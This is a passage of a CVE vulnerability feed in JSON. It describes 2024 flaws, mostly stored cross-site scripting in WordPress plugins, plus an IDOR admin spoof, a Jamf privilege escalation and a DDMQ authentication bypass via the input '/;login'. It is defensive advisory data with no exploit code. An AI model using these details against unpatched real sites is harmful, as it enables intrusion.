been found in didi DDMQ 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Console Module. The manipulation with the input /;login leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:didiglobal:ddmq:*:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-20T05:15Z", "lastModifiedDate" : "2024-10-22T17:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10174", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wedevs-project-manager/trunk/core/Permissions/Abstract_Permission.php#L32", "name" : "https://plugins.trac.wordpress.org/browser/wedevs-project-manager/trunk/core/Permissions/Abstract_Permission.php#L32", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3185807/wedevs-project-manager/trunk/core/Permissions/Abstract_Permission.php", "name" : "https://plugins.trac.wordpress.org/changeset/3185807/wedevs-project-manager/trunk/core/Permissions/Abstract_Permission.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dea2d045-d3b4-4b55-8b4f-5baa82a18834?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dea2d045-d3b4-4b55-8b4f-5baa82a18834?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.13 via the 'Abstract_Permission' class due to missing validation on the 'user_id' user controlled key. This makes it possible for unauthenticated attackers to spoof their identity to that of an administrator and access all of the plugins REST routes." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wedevs:wp_project_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.14", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-13T04:15Z", "lastModifiedDate" : "2025-02-05T16:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10175", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/pricing-tables-for-visual-composer/#developers", "name" : "https://wordpress.org/plugins/pricing-tables-for-visual-composer/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79091bc0-d9b6-4a4b-926d-0447193d27c5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79091bc0-d9b6-4a4b-926d-0447193d27c5?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wdo_pricing_tables shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-27T07:15Z", "lastModifiedDate" : "2024-11-27T07:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10176", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/compact-wp-audio-player/trunk/shortcodes-functions.php#L79", "name" : "https://plugins.trac.wordpress.org/browser/compact-wp-audio-player/trunk/shortcodes-functions.php#L79", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173541/", "name" : "https://plugins.trac.wordpress.org/changeset/3173541/", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/compact-wp-audio-player/#developers", "name" : "https://wordpress.org/plugins/compact-wp-audio-player/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bba90659-09a8-470a-91d3-d1986562672a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bba90659-09a8-470a-91d3-d1986562672a?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Compact WP Audio Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \r\nsc_embed_player shortcode in all versions up to, and including, 1.9.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-24T11:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10177", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/beds24-online-booking/#developers", "name" : "https://wordpress.org/plugins/beds24-online-booking/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2a6d017-93e4-40c6-a7d1-07e00faecf36?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2a6d017-93e4-40c6-a7d1-07e00faecf36?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Beds24 Online Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's beds24-link shortcode in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2024-11-21T13:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10178", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3199233%40gutentor%2Ftrunk&old=3179242%40gutentor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3199233%40gutentor%2Ftrunk&old=3179242%40gutentor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/gutentor/#developers", "name" : "https://wordpress.org/plugins/gutentor/#developers", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17ecebfd-b07f-415f-892f-e069ab84031a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17ecebfd-b07f-415f-892f-e069ab84031a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gutentor:gutentor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-12-05T05:15Z", "lastModifiedDate" : "2025-07-09T13:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10179", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/28216197-20b4-4d12-a610-661dca6fbbf2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/28216197-20b4-4d12-a610-661dca6fbbf2?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/slick-engagement/#developers", "name" : "https://wordpress.org/plugins/slick-engagement/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3184136/", "name" : "https://plugins.trac.wordpress.org/changeset/3184136/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Slickstream: Engagement and Conversions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's slick-grid shortcode in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-12T07:15Z", "lastModifiedDate" : "2024-11-12T13:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1018", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md", "name" : "https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252288", "name" : "https://vuldb.com/?ctiid.252288", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252288", "name" : "https://vuldb.com/?id.252288", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md", "name" : "https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252288", "name" : "https://vuldb.com/?id.252288", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252288", "name" : "https://vuldb.com/?ctiid.252288", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in PbootCMS 3.2.5-20230421. Affected is an unknown function of the file /admin.php?p=/Area/index#tab=t2. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252288." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pbootcms:pbootcms:3.2.5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-29T20:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10180", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0782bc16-7d21-4205-af01-97e3ad3db40b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0782bc16-7d21-4205-af01-97e3ad3db40b?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/cf7-repeatable-fields/#developers", "name" : "https://wordpress.org/plugins/cf7-repeatable-fields/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173935/", "name" : "https://plugins.trac.wordpress.org/changeset/3173935/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Contact Form 7 – Repeatable Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's field_group shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-24T13:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10181", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/newsletters-lite/#developers", "name" : "https://wordpress.org/plugins/newsletters-lite/#developers", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3175816/", "name" : "https://plugins.trac.wordpress.org/changeset/3175816/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tribulant:newsletters:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "4.9.9.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T12:15Z", "lastModifiedDate" : "2025-07-10T18:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10182", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/api.php#L46", "name" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/api.php#L46", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/api.php#L50", "name" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/api.php#L50", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/cognito-forms.php#L193", "name" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/cognito-forms.php#L193", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/cognito-forms.php#L51", "name" : "https://plugins.trac.wordpress.org/browser/cognito-forms/trunk/cognito-forms.php#L51", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/cognito-forms/#developers", "name" : "https://wordpress.org/plugins/cognito-forms/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/80b1d728-b5aa-4811-b92a-9ce36abc2b80?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/80b1d728-b5aa-4811-b92a-9ce36abc2b80?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Cognito Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-12-12T05:15Z", "lastModifiedDate" : "2024-12-12T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10183", "ASSIGNER" : "productsecurity@jamf.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://learn.jamf.com/en-US/bundle/jamf-remote-assist-release-notes/page/Jamf_Remote_Assist_Release_History.html#ariaid-title4", "name" : "https://learn.jamf.com/en-US/bundle/jamf-remote-assist-release-notes/page/Jamf_Remote_Assist_Release_History.html#ariaid-title4", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in Jamf Pro's Jamf Remote Assist tool allows a local, non-privileged user to escalate their privileges to root on MacOS systems." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-22T18:15Z", "lastModifiedDate" : "2024-10-23T15:12Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10184", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/077a31e7-de4b-418f-ac90-5c51a690bc65?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/077a31e7-de4b-418f-ac90-5c51a690bc65?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/streamweasels-kick-integration/#developers", "name" : "https://wordpress.org/plugins/streamweasels-kick-integration/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176023", "name" : "https://plugins.trac.wordpress.org/changeset/3176023", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-kick-embed shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T11:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10185", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/streamweasels-youtube-integration/#developers", "name" : "https://wordpress.org/plugins/streamweasels-youtube-integration/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176030", "name" : "https://plugins.trac.wordpress.org/changeset/3176030", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-youtube-embed shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T11:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10186", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ae1c32-18a7-4109-a7ea-dfd18fa3a8e2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ae1c32-18a7-4109-a7ea-dfd18fa3a8e2?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/event-post/#developers", "name" : "https://wordpress.org/plugins/event-post/#developers", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3182549/", "name" : "https://plugins.trac.wordpress.org/changeset/3182549/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Event post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's events_cal shortcode in all versions up to, and including, 5.9.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:avecnous:event_post:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.9.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : 